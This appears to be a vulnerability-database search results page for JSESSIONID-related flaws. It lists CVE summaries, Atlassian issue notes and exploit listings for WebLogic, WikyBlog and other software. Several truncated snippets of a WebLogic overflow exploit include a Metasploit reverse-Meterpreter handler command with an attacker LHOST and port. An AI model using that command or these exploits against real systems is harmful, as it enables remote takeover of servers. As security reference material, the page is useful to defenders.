168 matches found

Cvelist
added 2011/05/20 10:0 p.m. | 24 views

CVE-2010-0217

Zeacom Chat Server before 5.1 uses too short a random string for the JSESSIONID value, which makes it easier for remote attackers to hijack sessions or cause a denial of service (Chat Server crash or Tomcat daemon crash) via a brute-force attack...

AI score 6.6 | EPSS 0.01282
Exploits 1 | References 5

exploitpack
added 2011/04/19 12:0 a.m. | 28 views

Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - jdeE1Menu_Menu.mafService?e1.namespace Cross-Site Scripting

Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - jdeE1MenuMenu.mafService?e1.namespace Cross-Site Scripting source: https://www.securityfocus.com/bid/47479/info Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities. An attacker may leverage these...

Exploits 0

Exploit DB
added 2010/07/03 12:0 a.m. | 47 views

BEA WebLogic - JSESSIONID Cookie Value Overflow (Metasploit)

$Id: beaweblogicjsessionid.rb 9670 2010-07-03 03:19:07Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use...

CVSS 10 | AI score 6.6 | EPSS 0.61309
Exploits 12

Prion
added 2010/02/27 12:30 a.m. | 11 views

Session fixation

Session fixation vulnerability in WikyBlog 1.7.3 rc2 allows remote attackers to hijack web sessions by setting the jsessionid parameter to (1) index.php/Comment/Main, (2) index.php/Comment/Main/HomeWiky, or (3) index.php/Edit/Main...

CVSS 5.8 | AI score 7.2 | EPSS 0.01832
Exploits 1 | References 4 | Affected Software 1

NVD
added 2010/02/27 12:30 a.m. | 21 views

CVE-2010-0756

Session fixation vulnerability in WikyBlog 1.7.3 rc2 allows remote attackers to hijack web sessions by setting the jsessionid parameter to (1) index.php/Comment/Main, (2) index.php/Comment/Main/HomeWiky, or (3) index.php/Edit/Main...

CVSS 5.8 | AI score 6.7 | EPSS 0.01832
Exploits 1 | References 4

Packet Storm
added 2010/02/25 12:0 a.m. | 38 views

WikyBlog 1.7.3rc2 XSS / Shell Upload / RFI

======================================================================================== | Title : WikyBlog-1.7.3rc2 Mullti Vulnerability | Author : indoushka | email : [email protected] | Home : www.iq-ty.com | Web Site : http://www.wikyblog.com/ | Dork : Powered by WikyBlog | Tested on:...

Exploits 0

exploitpack
added 2010/02/24 12:0 a.m. | 14 views

WikyBlog 1.7.3rc2 - Multiple Vulnerabilities

WikyBlog 1.7.3rc2 - Multiple Vulnerabilities ======================================================================================== | Title : WikyBlog-1.7.3rc2 Mullti Vulnerability | Author : indoushka | email : [email protected] | Home : www.iq-ty.com | Web Site : http://www.wikyblog.com/ ...

AI score 0.2
Exploits 0

Packet Storm
added 2009/11/26 12:0 a.m. | 58 views

BEA Weblogic JSESSIONID Cookie Value Overflow

This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require 'msf/core' class Metasploit3 'BEA Weblogic...

CVSS 10 | AI score 0.3 | EPSS 0.61309
Exploits 12

Atlassian
added 2009/05/20 6:5 p.m. | 27 views

CSRF attack message thrown when JSESSIONID is changed

NOTE: This suggestion is for Confluence Server. Using Confluence Cloud? See the corresponding suggestion: http://jira.atlassian.com/browse/CONFCLOUD-15779. Symptoms: Anything that is using DWR will fail. Meaning: page editor is fully or partially unusable and it may...

Exploits 0 | Affected Software 1

Atlassian
added 2009/05/20 6:5 p.m. | 26 views

CSRF attack message thrown when JSESSIONID is changed

Symptoms: Anything that is using DWR will fail. Meaning: page editor is fully or partially unusable and it may display the text "Draft saving timed out" on top of the text area. At the same time, the following error messages are printed in the Confluence log: noformat 2009-05-15 08:06:36,011 ERRO...

AI score 0.1
Exploits 0 | Affected Software 1

Atlassian
added 2009/05/20 6:5 p.m. | 24 views

CSRF attack message thrown when JSESSIONID is changed

NOTE: This suggestion is for Confluence Cloud. Using Confluence Server? See the corresponding suggestion: http://jira.atlassian.com/browse/CONFSERVER-15779. Symptoms: Anything that is using DWR will fail. Meaning: page editor is fully or partially unusable and it may...

Exploits 0 | Affected Software 1

Saint
added 2009/04/10 12:0 a.m. | 51 views

Oracle WebLogic Server IIS Connector JSESSIONID buffer overflow

Added: 04/10/2009. CVE: CVE-2008-5457. BID: 33177. Background: Oracle WebLogic Server (formerly BEA WebLogic Server) is a Java web application platform. Problem: A buffer overflow vulnerability in the WebLogic IIS connector allows remote attackers to execute arbitrary commands by sending a long, special...

CVSS 10 | AI score 7.5 | EPSS 0.61309
Exploits 12

Saint
added 2009/04/10 12:0 a.m. | 63 views

Oracle WebLogic Server IIS Connector JSESSIONID buffer overflow

Added: 04/10/2009. CVE: CVE-2008-5457. BID: 33177. Background: Oracle WebLogic Server (formerly BEA WebLogic Server) is a Java web application platform. Problem: A buffer overflow vulnerability in the WebLogic IIS connector allows remote attackers to execute arbitrary commands by sending a long, special...

CVSS 10 | AI score 7.6 | EPSS 0.61309
Exploits 12

myhack58
added 2009/04/03 12:0 a.m. | 20 views

Oracle WebLogic IIS connector JSESSIONID Remote Overflow Exploit-vulnerability warning-the black bar safety net

Information source: milw0rm.com Copy the contents to the clipboard Code: !/usr/bin/perl No point in keeping this private anymore! ksOSe - 02/16/2009 - CVE-2008-5457 Tested on w2k sp4 and w2k3 R2 sp2 no NX cohelet framework-3.2 ./msfcli multi/handler...

Exploits 0

seebug.org
added 2009/04/02 12:0 a.m. | 46 views

Oracle WebLogic IIS connector JSESSIONID Remote Overflow Exploit

No description provided by source. !/usr/bin/perl No point in keeping this private anymore! ksOSe - 02/16/2009 - CVE-2008-5457 Tested on w2k sp4 and w2k3 R2 sp2 no NX cohelet framework-3.2 ./msfcli multi/handler PAYLOAD=windows/reflectivemeterpreter/reversetcp LHOST=10.10.10.1 LPORT=80 E Please...

CVSS 10 | AI score 0.2 | EPSS 0.61309
Exploits 12

exploitpack
added 2009/04/01 12:0 a.m. | 41 views

Oracle WebLogic IIS connector JSESSIONID - Remote Overflow

Oracle WebLogic IIS connector JSESSIONID - Remote Overflow !/usr/bin/perl No point in keeping this private anymore! ksOSe - 02/16/2009 - CVE-2008-5457 Tested on w2k sp4 and w2k3 R2 sp2 no NX cohelet framework-3.2 ./msfcli multi/handler PAYLOAD=windows/reflectivemeterpreter/reversetcp...

CVSS 10 | AI score 0.3 | EPSS 0.61309
Exploits 12

0day.today
added 2009/04/01 12:0 a.m. | 58 views

Oracle WebLogic IIS connector JSESSIONID Remote Overflow Exploit

Exploit for windows platform in category remote exploits ================================================================ Oracle WebLogic IIS connector JSESSIONID Remote Overflow Exploit ================================================================ !/usr/bin/perl No point in keeping this priva...

AI score 7.1 | EPSS 0.61309
Exploits 12

Exploit DB
added 2009/04/01 12:0 a.m. | 53 views

Oracle WebLogic IIS connector JSESSIONID - Remote Overflow

!/usr/bin/perl No point in keeping this private anymore! ksOSe - 02/16/2009 - CVE-2008-5457 Tested on w2k sp4 and w2k3 R2 sp2 no NX cohelet framework-3.2 ./msfcli multi/handler PAYLOAD=windows/reflectivemeterpreter/reversetcp LHOST=10.10.10.1 LPORT=80 E Please wait while we load the module tree...

CVSS 10 | AI score 7 | EPSS 0.61309
Exploits 12

Metasploit
added 2009/03/27 7:3 p.m. | 50 views

BEA WebLogic JSESSIONID Cookie Value Overflow

This module exploits a buffer overflow in BEA's WebLogic plugin. The vulnerable code is only accessible when clustering is configured. A request containing a long JSESSION cookie value can lead to arbitrary code execution. This module requires Metasploit: https://metasploit.com/download Current...

CVSS 10 | AI score 7.9 | EPSS 0.61309
Exploits 12

Atlassian
added 2009/01/05 1:54 p.m. | 21 views

Assignment of JSESSIONIDs

NOTE: This suggestion is for Confluence Cloud. Using Confluence Server? See the corresponding suggestion: http://jira.atlassian.com/browse/CONFSERVER-14112. I believe it should be a feature in future versions of Confluence to assign a different JSESSIONID to the user's...

AI score 2.3
Exploits 0 | Affected Software 1